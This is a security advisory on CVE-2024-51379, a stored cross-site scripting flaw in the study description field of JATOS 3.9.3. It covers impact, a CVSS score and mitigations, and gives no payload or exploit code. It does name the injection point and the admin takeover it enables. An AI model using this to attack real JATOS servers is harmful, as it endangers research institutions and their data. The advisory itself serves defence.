CVE-2024-51379 is a stored Cross-Site Scripting (XSS) vulnerability identified in JATOS version 3.9.3, a platform commonly used for managing online studies and experiments. The vulnerability resides in the description component of the study section, where user input is insufficiently sanitized or escaped, allowing attackers to inject arbitrary JavaScript code. This malicious script is stored persistently and executed when an administrator views the affected description field. Because the victim is an admin, the impact is severe: the attacker can hijack admin sessions, perform unauthorized actions, and potentially take over the entire application or underlying systems. The CVSS 3.1 score of 8.4 reflects the high impact on confidentiality, integrity, and availability, with network attack vector, low attack complexity, but requiring high privileges for injection and user interaction for execution. No patches or exploits are currently publicly available, but the vulnerability is critical for environments relying on JATOS for sensitive research data management.

The vulnerability allows attackers to execute arbitrary JavaScript in the context of an administrator’s browser, leading to potential account takeover, unauthorized data access, and manipulation of study data or configurations. This can compromise the confidentiality of sensitive research data, integrity of study results, and availability of the JATOS service. Attackers could also leverage the admin’s privileges to pivot deeper into the network or exfiltrate data. Given that JATOS is used globally in academic and research institutions, exploitation could disrupt critical research activities and damage organizational reputation. The requirement for admin interaction limits mass exploitation but targeted attacks against high-value research environments pose significant risk.

Organizations should immediately review and sanitize all user inputs in the description fields, employing strict input validation and output encoding to prevent script injection. Implement Content Security Policy (CSP) headers to restrict script execution origins. Limit admin access and monitor admin activities for suspicious behavior. Regularly update JATOS to the latest version once a patch is released. In the interim, restrict who can submit or edit study descriptions and conduct manual reviews before publishing. Employ web application firewalls (WAFs) with rules to detect and block XSS payloads targeting JATOS. Educate administrators about the risk of clicking on untrusted content within the platform.